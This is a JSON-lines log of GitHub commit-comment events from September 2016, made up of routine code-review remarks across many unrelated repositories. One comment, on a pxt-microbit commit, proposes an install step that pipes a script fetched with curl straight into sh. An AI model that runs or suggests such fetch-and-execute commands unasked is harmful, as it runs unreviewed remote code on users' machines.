{"id":"4532165352","type":"CommitCommentEvent","actor":{"login":"seanfarley"},"repo":{"name":"facebook/fbthrift"},"payload":{"comment":{"id":18940381,"position":null,"line":null,"path":null,"commit_id":"aeaa4e685de99f4acfc5cc4288502476c74a697c","created_at":"2016-09-08T06:58:28Z","updated_at":"2016-09-08T06:58:28Z","body":"It was indeed because it would erroneously report that clock_gettime existed. I can look into this when I'm on my laptop tomorrow."}},"created_at":"2016-09-08T06:58:28Z"}
{"id":"4532165918","type":"CommitCommentEvent","actor":{"login":"basrieter"},"repo":{"name":"basrieter/xbmc"},"payload":{"comment":{"id":18940384,"position":null,"line":null,"path":null,"commit_id":"c8e7101a3dd2a794a95d051fe7fca557ee0c3b36","created_at":"2016-09-08T06:58:37Z","updated_at":"2016-09-08T06:58:37Z","body":"Sure: https://github.com/xbmc/xbmc/pull/10430"}},"created_at":"2016-09-08T06:58:37Z"}
{"id":"4532165981","type":"CommitCommentEvent","actor":{"login":"IvenMax"},"repo":{"name":"IvenMax/TimeTextView"},"payload":{"comment":{"id":18940385,"position":2,"line":2,"path":"README.md","commit_id":"c92a8a1d0119632644c168dda60ee641c7bd350e","created_at":"2016-09-08T06:58:38Z","updated_at":"2016-09-08T06:58:38Z","body":"暂不完善，下不规划--添加倒计时结束监听事件，处理提醒事件"}},"created_at":"2016-09-08T06:58:38Z"}
{"id":"4532166469","type":"CommitCommentEvent","actor":{"login":"yujunz"},"repo":{"name":"openzero-zte/doctor"},"payload":{"comment":{"id":18940387,"position":34,"line":34,"path":"docs/doctor_test_script_refactor.rst","commit_id":"338d0bd063e4264e6f0e665a5cb270f110879853","created_at":"2016-09-08T06:58:45Z","updated_at":"2016-09-08T06:58:45Z","body":"Is there any API existing? I see only `run.sh`"}},"created_at":"2016-09-08T06:58:45Z"}
{"id":"4532166849","type":"CommitCommentEvent","actor":{"login":"fukushiro-sumire"},"repo":{"name":"fukushiro-sumire/ToDoList"},"payload":{"comment":{"id":18940388,"position":null,"line":null,"path":null,"commit_id":"4e19ddb95590e46cdb85a9be9ecaae35c18ae77b","created_at":"2016-09-08T06:58:52Z","updated_at":"2016-09-08T06:58:52Z","body":"https://frozen-sands-36680.herokuapp.com/tasks\r\n完成しました\r\n遅れてすいませんでした"}},"created_at":"2016-09-08T06:58:52Z"}
{"id":"4532174930","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"sweeneychris/TheiaSfM"},"payload":{"comment":{"id":18940423,"position":13,"line":68,"path":"src/theia/sfm/camera/reprojection_error.h","commit_id":"7caaa4618af9f8c5df0b55af40368472a634107a","created_at":"2016-09-08T07:01:02Z","updated_at":"2016-09-08T07:01:02Z","body":"neare => near"}},"created_at":"2016-09-08T07:01:02Z"}
{"id":"4532175100","type":"CommitCommentEvent","actor":{"login":"Binaryvector"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18940424,"position":52,"line":907,"path":"HarvestMap/DB/HarvestMapDB.lua","commit_id":"3502aa1ec8b8edd109431db11b437d4390896365","created_at":"2016-09-08T07:01:05Z","updated_at":"2016-09-08T07:01:05Z","body":"local/closure access is faster than a hash lookup. So local Options = Harvest.options and then using Options in the rest of the file will outperform Harvest.options."}},"created_at":"2016-09-08T07:01:05Z"}
{"id":"4532176559","type":"CommitCommentEvent","actor":{"login":"quynhn"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18940427,"position":46,"line":46,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/event/MailboxAnnotationListener.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-08T07:01:27Z","updated_at":"2016-09-08T07:01:27Z","body":"I've just thought that this listener can be called at any time from it's triggered, do not depend on any other event."}},"created_at":"2016-09-08T07:01:27Z"}
{"id":"4532176600","type":"CommitCommentEvent","actor":{"login":"yujunz"},"repo":{"name":"openzero-zte/doctor"},"payload":{"comment":{"id":18940428,"position":40,"line":40,"path":"docs/doctor_test_script_refactor.rst","commit_id":"338d0bd063e4264e6f0e665a5cb270f110879853","created_at":"2016-09-08T07:01:28Z","updated_at":"2016-09-08T07:01:28Z","body":"extensible"}},"created_at":"2016-09-08T07:01:28Z"}
{"id":"4532177406","type":"CommitCommentEvent","actor":{"login":"Binaryvector"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18940430,"position":113,"line":184,"path":"HarvestMap/Event/HarvestEvents.lua","commit_id":"3502aa1ec8b8edd109431db11b437d4390896365","created_at":"2016-09-08T07:01:41Z","updated_at":"2016-09-08T07:01:41Z","body":"Ieah, I also removed that stuff in my local build"}},"created_at":"2016-09-08T07:01:41Z"}
{"id":"4532178092","type":"CommitCommentEvent","actor":{"login":"shanse"},"repo":{"name":"shanse/git-test"},"payload":{"comment":{"id":18940431,"position":null,"line":null,"path":null,"commit_id":"e930ce06339205071488f6b6da6fb165273dc381","created_at":"2016-09-08T07:01:53Z","updated_at":"2016-09-08T07:01:53Z","body":"第二次测试，第一次因为网络原因登录帐号失败。现在通过命令行操作成功push。仍然是测试"}},"created_at":"2016-09-08T07:01:53Z"}
{"id":"4532180492","type":"CommitCommentEvent","actor":{"login":"yujunz"},"repo":{"name":"openzero-zte/doctor"},"payload":{"comment":{"id":18940432,"position":85,"line":85,"path":"docs/doctor_test_script_refactor.rst","commit_id":"338d0bd063e4264e6f0e665a5cb270f110879853","created_at":"2016-09-08T07:02:27Z","updated_at":"2016-09-08T07:02:27Z","body":"More practical steps required. How to refactor the scripts smoothly without breaking existing test."}},"created_at":"2016-09-08T07:02:27Z"}
{"id":"4532180783","type":"CommitCommentEvent","actor":{"login":"michalmarcinkowski"},"repo":{"name":"Sylius/Sylius"},"payload":{"comment":{"id":18940433,"position":null,"line":null,"path":null,"commit_id":"d5e983c3f94f1893b21c6b8d4a74ccdd47f4b01a","created_at":"2016-09-08T07:02:32Z","updated_at":"2016-09-08T07:02:32Z","body":"It's not used anywhere anymore."}},"created_at":"2016-09-08T07:02:32Z"}
{"id":"4532181114","type":"CommitCommentEvent","actor":{"login":"Binaryvector"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18940434,"position":122,"line":152,"path":"HarvestMap/HarvestMap.lua","commit_id":"3502aa1ec8b8edd109431db11b437d4390896365","created_at":"2016-09-08T07:02:37Z","updated_at":"2016-09-08T07:02:37Z","body":"It's not a global access but a closure. The file starts with local Events = Harvest.events"}},"created_at":"2016-09-08T07:02:37Z"}
{"id":"4532181518","type":"CommitCommentEvent","actor":{"login":"mikewest"},"repo":{"name":"tabatkins/bikeshed"},"payload":{"comment":{"id":18940435,"position":16,"line":599,"path":"bikeshed/__init__.py","commit_id":"82c85ec257d20430690eb03d0cb88aa83f96bdde","created_at":"2016-09-08T07:02:43Z","updated_at":"2016-09-08T07:02:43Z","body":"Yay! :)"}},"created_at":"2016-09-08T07:02:43Z"}
{"id":"4532181612","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18940436,"position":null,"line":null,"path":null,"commit_id":"21b0f5236d2741c1202fa4c9d98ec6d619d6414d","created_at":"2016-09-08T07:02:45Z","updated_at":"2016-09-08T07:02:45Z","body":"One more interesting remark (chess related instead of C++ related :-) \r\n\r\nIf I understand correctly, you try to reduce less the branch in the search tree if the first move is an obvious candidate for a threat of winning material. For bishops and rooks, since they are sliders, I think you should calculate the new attacks the move offers, *ie* the difference between the attacks after and before the move is made (note that for pawns and knight, the attacks after the move are always new because pawns and knights alternate color squares).\r\n\r\nSo something like this for line 587:\r\n\r\n````\r\nreturn !!(targets[type_of(pc)] & (attacks_from(pc, to) & ~attacks_from(pc, from)));\r\n````"}},"created_at":"2016-09-08T07:02:45Z"}
{"id":"4532183170","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18940440,"position":246,"line":336,"path":"Part_II_Theory/22._angular_convolution_a_better_algorithm.tex","commit_id":"da5cea54267f03d439c0d2ee45831dc7d2dc9424","created_at":"2016-09-08T07:03:10Z","updated_at":"2016-09-08T07:03:10Z","body":"I meant \"one by one\", sequentially seems better..."}},"created_at":"2016-09-08T07:03:10Z"}
{"id":"4532184304","type":"CommitCommentEvent","actor":{"login":"AmyHelmy"},"repo":{"name":"fastlane/code-of-conduct"},"payload":{"comment":{"id":18940442,"position":null,"line":null,"path":null,"commit_id":"06662a5a011dafe48d1f6cf117bd3981bfa9678e","created_at":"2016-09-08T07:03:27Z","updated_at":"2016-09-08T07:03:27Z","body":"Read me"}},"created_at":"2016-09-08T07:03:27Z"}
{"id":"4532184340","type":"CommitCommentEvent","actor":{"login":"yujunz"},"repo":{"name":"openzero-zte/doctor"},"payload":{"comment":{"id":18940443,"position":99,"line":99,"path":"docs/doctor_test_script_refactor.rst","commit_id":"338d0bd063e4264e6f0e665a5cb270f110879853","created_at":"2016-09-08T07:03:28Z","updated_at":"2016-09-08T07:03:28Z","body":"all combinations or just part of them?"}},"created_at":"2016-09-08T07:03:28Z"}
{"id":"4532185196","type":"CommitCommentEvent","actor":{"login":"PoisonAlien"},"repo":{"name":"PoisonAlien/maftools"},"payload":{"comment":{"id":18940445,"position":31,"line":76,"path":"R/readSegs.R","commit_id":"9e1e02b150a73a4d342fd36586739ecbb81f345a","created_at":"2016-09-08T07:03:42Z","updated_at":"2016-09-08T07:03:42Z","body":"#11 "}},"created_at":"2016-09-08T07:03:42Z"}
{"id":"4532186033","type":"CommitCommentEvent","actor":{"login":"yujunz"},"repo":{"name":"openzero-zte/doctor"},"payload":{"comment":{"id":18940447,"position":104,"line":104,"path":"docs/doctor_test_script_refactor.rst","commit_id":"338d0bd063e4264e6f0e665a5cb270f110879853","created_at":"2016-09-08T07:03:55Z","updated_at":"2016-09-08T07:03:55Z","body":"I think document for adding a new module is expected."}},"created_at":"2016-09-08T07:03:55Z"}
{"id":"4532186560","type":"CommitCommentEvent","actor":{"login":"mikewest"},"repo":{"name":"tabatkins/bikeshed"},"payload":{"comment":{"id":18940449,"position":16,"line":599,"path":"bikeshed/__init__.py","commit_id":"82c85ec257d20430690eb03d0cb88aa83f96bdde","created_at":"2016-09-08T07:04:04Z","updated_at":"2016-09-08T07:04:04Z","body":"Actually, boo. The WebAppSec version applied this to every `<a>`, not just `<a rel=\"previous\">`. That seems like a pretty safe operation, so why limit it?"}},"created_at":"2016-09-08T07:04:04Z"}
{"id":"4532186959","type":"CommitCommentEvent","actor":{"login":"juvevood"},"repo":{"name":"tensor5/arch-atom"},"payload":{"comment":{"id":18940451,"position":null,"line":null,"path":null,"commit_id":"fe61a99cf3b3387177277d2b6aa16d74531076c1","created_at":"2016-09-08T07:04:11Z","updated_at":"2016-09-08T07:04:11Z","body":"but black theme was wrong\r\n![black](https://cloud.githubusercontent.com/assets/1421513/18340056/869389e6-7568-11e6-9cd1-b51a2b5df046.png)\r\n"}},"created_at":"2016-09-08T07:04:11Z"}
{"id":"4532193174","type":"CommitCommentEvent","actor":{"login":"ShannSheeran"},"repo":{"name":"FernandoIsco/Icode"},"payload":{"comment":{"id":18940455,"position":25,"line":25,"path":".project","commit_id":"bd1e3df517e587e3a73859229a075e0daec782df","created_at":"2016-09-08T07:05:52Z","updated_at":"2016-09-08T07:05:52Z","body":"www"}},"created_at":"2016-09-08T07:05:52Z"}
{"id":"4532197057","type":"CommitCommentEvent","actor":{"login":"ssaunier"},"repo":{"name":"OObatwomanOO/smart-city-middleman"},"payload":{"comment":{"id":18940475,"position":null,"line":null,"path":null,"commit_id":"41f1900517cde8add1d19f63f54dc21be76510a5","created_at":"2016-09-08T07:06:58Z","updated_at":"2016-09-08T07:06:58Z","body":"It must be\r\n\r\n```\r\nscs.lewagon.com\r\n```\r\n\r\nlike in the PR I submitted"}},"created_at":"2016-09-08T07:06:58Z"}
{"id":"4532204091","type":"CommitCommentEvent","actor":{"login":"ajamil76"},"repo":{"name":"ajamil76/ethereum.com"},"payload":{"comment":{"id":18940496,"position":null,"line":null,"path":null,"commit_id":"356a4322d76e0231b1df3cc4053870412a90c939","created_at":"2016-09-08T07:08:57Z","updated_at":"2016-09-08T07:08:57Z","body":"Good money digital abad21"}},"created_at":"2016-09-08T07:08:57Z"}
{"id":"4532205358","type":"CommitCommentEvent","actor":{"login":"ip6li"},"repo":{"name":"ip6li/AndroidOpenCard"},"payload":{"comment":{"id":18940499,"position":null,"line":null,"path":null,"commit_id":"a2da960d4872069f684deb1a88cd1b0532ac5a86","created_at":"2016-09-08T07:09:19Z","updated_at":"2016-09-08T07:09:19Z","body":"#3 Solved"}},"created_at":"2016-09-08T07:09:19Z"}
{"id":"4532205868","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18940500,"position":323,"line":413,"path":"Part_II_Theory/22._angular_convolution_a_better_algorithm.tex","commit_id":"da5cea54267f03d439c0d2ee45831dc7d2dc9424","created_at":"2016-09-08T07:09:28Z","updated_at":"2016-09-08T07:09:28Z","body":"There is only one global coordinate system."}},"created_at":"2016-09-08T07:09:28Z"}
{"id":"4532206703","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":18940503,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-08T07:09:42Z","updated_at":"2016-09-08T07:09:42Z","body":"Why do this?"}},"created_at":"2016-09-08T07:09:42Z"}
{"id":"4532211288","type":"CommitCommentEvent","actor":{"login":"Maxfashko"},"repo":{"name":"peeerrrooo/py_les"},"payload":{"comment":{"id":18940523,"position":null,"line":null,"path":null,"commit_id":"fa78faeebe634910a81aa226eb6339532e29c9db","created_at":"2016-09-08T07:11:01Z","updated_at":"2016-09-08T07:11:01Z","body":"В Win python страшное дело)"}},"created_at":"2016-09-08T07:11:01Z"}
{"id":"4532213822","type":"CommitCommentEvent","actor":{"login":"yanns"},"repo":{"name":"commercetools/commercetools-jvm-sdk"},"payload":{"comment":{"id":18940530,"position":null,"line":null,"path":null,"commit_id":"19fde76447acf13177d9e738b1e0a1c3f5217b83","created_at":"2016-09-08T07:11:42Z","updated_at":"2016-09-08T07:11:42Z","body":"👍 "}},"created_at":"2016-09-08T07:11:42Z"}
{"id":"4532214683","type":"CommitCommentEvent","actor":{"login":"ParkSeongYeol"},"repo":{"name":"ParkSeongYeol/flexbison"},"payload":{"comment":{"id":18940533,"position":6,"line":6,"path":"README.md","commit_id":"c8f27ec35e18640f84c4179ebecf986d39e92d5f","created_at":"2016-09-08T07:11:57Z","updated_at":"2016-09-08T07:11:57Z","body":"%nonassoc은 동시에 사용하면 안된다\r\n%nonassoc '>' '<'\r\n이렇게 정의하면 \r\nexp1 < exp2 > exp3 같은식으로 사용하면 안됨 "}},"created_at":"2016-09-08T07:11:57Z"}
{"id":"4532217535","type":"CommitCommentEvent","actor":{"login":"TobbeTripitaka"},"repo":{"name":"TobbeTripitaka/visu"},"payload":{"comment":{"id":18940536,"position":null,"line":null,"path":null,"commit_id":"43256da069403ef5633c4bdcbf589cdc2da86ab1","created_at":"2016-09-08T07:12:41Z","updated_at":"2016-09-08T07:12:41Z","body":"Check:\r\n   Right colormap\r\n   Projection False/True\r\n"}},"created_at":"2016-09-08T07:12:41Z"}
{"id":"4532220876","type":"CommitCommentEvent","actor":{"login":"peeerrrooo"},"repo":{"name":"peeerrrooo/py_les"},"payload":{"comment":{"id":18940543,"position":null,"line":null,"path":null,"commit_id":"fa78faeebe634910a81aa226eb6339532e29c9db","created_at":"2016-09-08T07:13:33Z","updated_at":"2016-09-08T07:13:33Z","body":"Не спорю) в принципе как почти любой серверный софт для Win немного проблема)"}},"created_at":"2016-09-08T07:13:33Z"}
{"id":"4532222106","type":"CommitCommentEvent","actor":{"login":"Nirgalz"},"repo":{"name":"eBrigade/eBrigadeV2"},"payload":{"comment":{"id":18940544,"position":null,"line":null,"path":null,"commit_id":"b531cf27d09c43dcdf2eaee05a659166beaee1b6","created_at":"2016-09-08T07:13:52Z","updated_at":"2016-09-08T07:13:52Z","body":"Bonjour,\r\nLa jointure entre, par exemple, une opération et un event se fait au niveau de la table rescue_plan qui a un event_id. Il ne vaudrait pas mieux que la jointure se fasse au niveau de la table event pour permettre à plusieurs events d'être associés à une opération pour gérer les équipes ? Si oui, un champ générique type module_id dans la table event pouvant être lié à l'id de tout type d'événement par une condition pour gérer les différents contain possible dans le model de la table event ?"}},"created_at":"2016-09-08T07:13:52Z"}
{"id":"4532224826","type":"CommitCommentEvent","actor":{"login":"CharlesMorrison"},"repo":{"name":"CharlesMorrison/CharlesMorrison.github.io"},"payload":{"comment":{"id":18940551,"position":null,"line":null,"path":null,"commit_id":"76b2c52dfc7513e4cabd9596c2df08c26f33c63e","created_at":"2016-09-08T07:14:36Z","updated_at":"2016-09-08T07:14:36Z","body":"Hopefully everything is coming out alright."}},"created_at":"2016-09-08T07:14:36Z"}
{"id":"4532227340","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18940560,"position":null,"line":null,"path":null,"commit_id":"e8d6e673cd4cb235488bdb286f77f8879b024a2d","created_at":"2016-09-08T07:15:17Z","updated_at":"2016-09-08T07:15:17Z","body":"Hab's gestern leider nicht ausprobiert aber schau heute mal nach \r\n\r\nWenn die Fehlermeldung kommt Klick mal drauf und schau was sie anzeigt \r\nAlso von der Fehlermeldung her würd ich sagen dass anscheinend die Angabe der Breite fehlt aber bin mir nicht sicher \r\nWie gesagt ich schau heute gleich mal nach"}},"created_at":"2016-09-08T07:15:17Z"}
{"id":"4532229028","type":"CommitCommentEvent","actor":{"login":"PoisonAlien"},"repo":{"name":"PoisonAlien/maftools"},"payload":{"comment":{"id":18940563,"position":19,"line":66,"path":"R/readSegs.R","commit_id":"9e1e02b150a73a4d342fd36586739ecbb81f345a","created_at":"2016-09-08T07:15:41Z","updated_at":"2016-09-08T07:15:41Z","body":"#11 "}},"created_at":"2016-09-08T07:15:41Z"}
{"id":"4532229766","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-jvm-libraries"},"payload":{"comment":{"id":18940565,"position":5,"line":39,"path":"build.gradle","commit_id":"f5f956a58e89b3fff889e5372f779183019f8e74","created_at":"2016-09-08T07:15:53Z","updated_at":"2016-09-08T07:15:53Z","body":"Since we're using the git plugin for Gradle, perhaps it's worth seeing if we can pull this information from the git repo."}},"created_at":"2016-09-08T07:15:53Z"}
{"id":"4532253949","type":"CommitCommentEvent","actor":{"login":"mbaechler"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18940615,"position":46,"line":46,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/event/MailboxAnnotationListener.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-08T07:22:17Z","updated_at":"2016-09-08T07:22:17Z","body":"before extracting that code into a listener, It was synchronous. Switching to asynchronous should by studied carefully IMO"}},"created_at":"2016-09-08T07:22:17Z"}
{"id":"4532257726","type":"CommitCommentEvent","actor":{"login":"gylien"},"repo":{"name":"gylien/scale-letkf"},"payload":{"comment":{"id":18940624,"position":null,"line":null,"path":null,"commit_id":"d6f6ad1504f98dd1ad6358942b5a22eba4223328","created_at":"2016-09-08T07:23:15Z","updated_at":"2016-09-08T07:23:15Z","body":"It seems that fipp does not accept empty argument (''), so use '-' instead."}},"created_at":"2016-09-08T07:23:15Z"}
{"id":"4532264088","type":"CommitCommentEvent","actor":{"login":"wooramc"},"repo":{"name":"wooramc/soop_rep"},"payload":{"comment":{"id":18940648,"position":null,"line":null,"path":null,"commit_id":"2da2e2cc1f1ee11a44f8e14a1f1bb9622e627b17","created_at":"2016-09-08T07:24:54Z","updated_at":"2016-09-08T07:24:54Z","body":"A"}},"created_at":"2016-09-08T07:24:54Z"}
{"id":"4532266663","type":"CommitCommentEvent","actor":{"login":"quynhn"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18940652,"position":46,"line":46,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/event/MailboxAnnotationListener.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-08T07:25:34Z","updated_at":"2016-09-08T07:25:34Z","body":"OK, I will dig more into the code and give me the reason if I still use that."}},"created_at":"2016-09-08T07:25:34Z"}
{"id":"4532268354","type":"CommitCommentEvent","actor":{"login":"tngotran"},"repo":{"name":"AKA-Intelligence/musio_arduino"},"payload":{"comment":{"id":18940656,"position":253,"line":206,"path":"apard_p0.ino","commit_id":"97312bdfabe93bfbe8ab829d23fd6e43c07cb008","created_at":"2016-09-08T07:25:59Z","updated_at":"2016-09-08T07:25:59Z","body":"I am note sure whether we can access to the serial receive buffer to set the index parameter or not. But it may not be urgent right now so I could modify the code later."}},"created_at":"2016-09-08T07:25:59Z"}
{"id":"4532268759","type":"CommitCommentEvent","actor":{"login":"tngotran"},"repo":{"name":"AKA-Intelligence/musio_arduino"},"payload":{"comment":{"id":18940658,"position":247,"line":201,"path":"apard_p0.ino","commit_id":"97312bdfabe93bfbe8ab829d23fd6e43c07cb008","created_at":"2016-09-08T07:26:06Z","updated_at":"2016-09-08T07:26:06Z","body":"Hi bro Chadrik,\r\nIn the simple case with only two LED fists, the LR detection is not necessary. But in the general case with any devices (user-custom acc.dev, LED acc.dev, only two fists, fist and LED acc.dev combination), do we need a classification?\r\n"}},"created_at":"2016-09-08T07:26:06Z"}
{"id":"4532269995","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-jvm-libraries"},"payload":{"comment":{"id":18940662,"position":5,"line":39,"path":"build.gradle","commit_id":"f5f956a58e89b3fff889e5372f779183019f8e74","created_at":"2016-09-08T07:26:25Z","updated_at":"2016-09-08T07:26:25Z","body":"Agreed, and thought about that myself, but wanted to get something out there that works. Feel free to take a stab at it if you have a moment."}},"created_at":"2016-09-08T07:26:25Z"}
{"id":"4532270979","type":"CommitCommentEvent","actor":{"login":"coke11"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":18940666,"position":null,"line":null,"path":null,"commit_id":"062d35f0cf8b03ef23202eb3303cf61ed15c11cc","created_at":"2016-09-08T07:26:41Z","updated_at":"2016-09-08T07:26:41Z","body":"Ah, ok"}},"created_at":"2016-09-08T07:26:41Z"}
{"id":"4532274801","type":"CommitCommentEvent","actor":{"login":"yellowled"},"repo":{"name":"s9y/additional_plugins"},"payload":{"comment":{"id":18940684,"position":null,"line":null,"path":null,"commit_id":"ba0e8d93ba9ca3197b0b260835d5110c47f85e60","created_at":"2016-09-08T07:27:41Z","updated_at":"2016-09-08T07:27:41Z","body":"Wouldn't it make more sense (if possible) to set `$social_image` in the theme's `config.inc.php`? That way, new themes could add their own social images."}},"created_at":"2016-09-08T07:27:41Z"}
{"id":"4532275443","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18940686,"position":null,"line":null,"path":null,"commit_id":"9cfc0410a8eab450e0bed5f5739a310648762fff","created_at":"2016-09-08T07:27:50Z","updated_at":"2016-09-08T07:27:50Z","body":"@Edaka: Sorry, my merge somehow erased your changes to ISSUE_TEMPLATE.\r\n\r\n@Iamblichos and @ilteroi: this merge includes all of your new content as of 9/8.\r\n\r\nTodo: Test MP desyncs\r\n\r\nThings we really need to work on: Naval AI - the AI just isn't being aggressive enough with units at sea. Far too happy to idle, rather than launching attacks on coastal cities. I've done some work on this, but more can be done.\r\n"}},"created_at":"2016-09-08T07:27:50Z"}
{"id":"4532281437","type":"CommitCommentEvent","actor":{"login":"mmoskal"},"repo":{"name":"Microsoft/pxt-microbit"},"payload":{"comment":{"id":18940705,"position":null,"line":null,"path":null,"commit_id":"1ee6274100f92579aaf0a0a146987582827a8599","created_at":"2016-09-08T07:29:12Z","updated_at":"2016-09-08T07:29:12Z","body":"You could do:\r\n```\r\ncurl -s https://raw.githubusercontent.com/Microsoft/pxt-rpi/master/install.sh | sh -\r\n```\r\nas the installation instructions\r\n"}},"created_at":"2016-09-08T07:29:12Z"}
{"id":"4532288306","type":"CommitCommentEvent","actor":{"login":"maxim5"},"repo":{"name":"iluxa-com/demo"},"payload":{"comment":{"id":18940716,"position":2,"line":0,"path":"my.test","commit_id":"782559fce6a5f913b19ce69700aa75f255c8e6a4","created_at":"2016-09-08T07:30:45Z","updated_at":"2016-09-08T07:30:45Z","body":"sadf111"}},"created_at":"2016-09-08T07:30:45Z"}
{"id":"4532291158","type":"CommitCommentEvent","actor":{"login":"maxim5"},"repo":{"name":"iluxa-com/demo"},"payload":{"comment":{"id":18940718,"position":4,"line":0,"path":"my.test","commit_id":"782559fce6a5f913b19ce69700aa75f255c8e6a4","created_at":"2016-09-08T07:31:27Z","updated_at":"2016-09-08T07:31:27Z","body":"-web"}},"created_at":"2016-09-08T07:31:27Z"}
{"id":"4532300826","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18940750,"position":6,"line":30,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"d7d18043196734ae98da57ea24033b34cd485765","created_at":"2016-09-08T07:33:42Z","updated_at":"2016-09-08T07:33:42Z","body":"Good spot!"}},"created_at":"2016-09-08T07:33:42Z"}
{"id":"4532304275","type":"CommitCommentEvent","actor":{"login":"christinaa"},"repo":{"name":"christinaa/rpi-open-firmware"},"payload":{"comment":{"id":18940758,"position":null,"line":null,"path":null,"commit_id":"9eed9d06e01a7f2c6dc2bd1e0138ce877ac10f5b","created_at":"2016-09-08T07:34:30Z","updated_at":"2016-09-08T07:34:30Z","body":"This is incorrect, in a DT:\r\n\r\n- The correct DT node is `/chosen/bootargs`, not `cmdline`.\r\n- Paths usually start with `/`, so you would go with `/chosen/bootargs`.\r\n- I believe you first would have to create the chosen node, get its nodeoffset and then use `fdt_appendprop` instead which appens a property to a node (you could check if the property already exists with `fdt_get_property`). To add a new node to a FDT you may need to use `fdt_add_subnode`."}},"created_at":"2016-09-08T07:34:30Z"}
{"id":"4532307402","type":"CommitCommentEvent","actor":{"login":"maxim5"},"repo":{"name":"iluxa-com/demo"},"payload":{"comment":{"id":18940769,"position":null,"line":null,"path":null,"commit_id":"d735d47458de62e063c8a0f27f2007b86b9daa2b","created_at":"2016-09-08T07:35:16Z","updated_at":"2016-09-08T07:35:16Z","body":"|`.idea/workspace.xml:216`|\n|---|\n<component name=\"NamedScopeManagerPhpServers\"> 193:216"}},"created_at":"2016-09-08T07:35:16Z"}
{"id":"4532313218","type":"CommitCommentEvent","actor":{"login":"PawelGutkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":18940776,"position":18,"line":44,"path":"pom.xml","commit_id":"abc65fc6ee8babf10fe06d853527301bac7f7693","created_at":"2016-09-08T07:36:35Z","updated_at":"2016-09-08T07:36:35Z","body":"Hey @dkayiwa, since you changed version of providermanagement module Reference Application is failing to setup, logs at: http://pastebin.com/FAZe4waz. you have merged commit with liquibase changes lately: https://github.com/openmrs/openmrs-module-providermanagement/commit/6b9108e81aee27eb556ac5c625f02462252d57b6, I believe this is cause of errors."}},"created_at":"2016-09-08T07:36:35Z"}
{"id":"4532313593","type":"CommitCommentEvent","actor":{"login":"tngotran"},"repo":{"name":"AKA-Intelligence/musio_arduino"},"payload":{"comment":{"id":18940777,"position":218,"line":172,"path":"apard_p0.ino","commit_id":"97312bdfabe93bfbe8ab829d23fd6e43c07cb008","created_at":"2016-09-08T07:36:41Z","updated_at":"2016-09-08T07:36:41Z","body":"About this information, I have a little confuse on CMD package format. \r\nCould you help me to confirm or correct the example below?\r\n\r\nExample of two serial CMD packets, data save in rxbuf\r\nrxbuf = (start signal \"s\")(device id)(command)(devider \";\" )(start signal \"s\") (device id)(command)(finish signal \"$\" )."}},"created_at":"2016-09-08T07:36:41Z"}
{"id":"4532317360","type":"CommitCommentEvent","actor":{"login":"romanivanov21"},"repo":{"name":"romanivanov21/web_server"},"payload":{"comment":{"id":18940783,"position":37,"line":36,"path":"src/logs/server_log.cpp","commit_id":"3735fc1bee1188b1bbf4087e02055fcc119c3be1","created_at":"2016-09-08T07:37:32Z","updated_at":"2016-09-08T07:37:32Z","body":"А если не удалось записать меньше чем log_msg.size()"}},"created_at":"2016-09-08T07:37:32Z"}
{"id":"4532319802","type":"CommitCommentEvent","actor":{"login":"RichardL7"},"repo":{"name":"RichardL7/HelloWorld.md"},"payload":{"comment":{"id":18940788,"position":1,"line":1,"path":"README.md","commit_id":"7278e72449778eb35032b4227904aabaed7c12b6","created_at":"2016-09-08T07:38:12Z","updated_at":"2016-09-08T07:38:12Z","body":"This is a markdown file\r\n"}},"created_at":"2016-09-08T07:38:12Z"}
{"id":"4532321212","type":"CommitCommentEvent","actor":{"login":"Silph-Road"},"repo":{"name":"Necrobot-Private/PokemonGo.RocketAPI"},"payload":{"comment":{"id":18940790,"position":null,"line":null,"path":null,"commit_id":"3f908f0309fe8e6b5ad71338c36300df88956d09","created_at":"2016-09-08T07:38:33Z","updated_at":"2016-09-08T07:38:33Z","body":"yes very nice! "}},"created_at":"2016-09-08T07:38:33Z"}
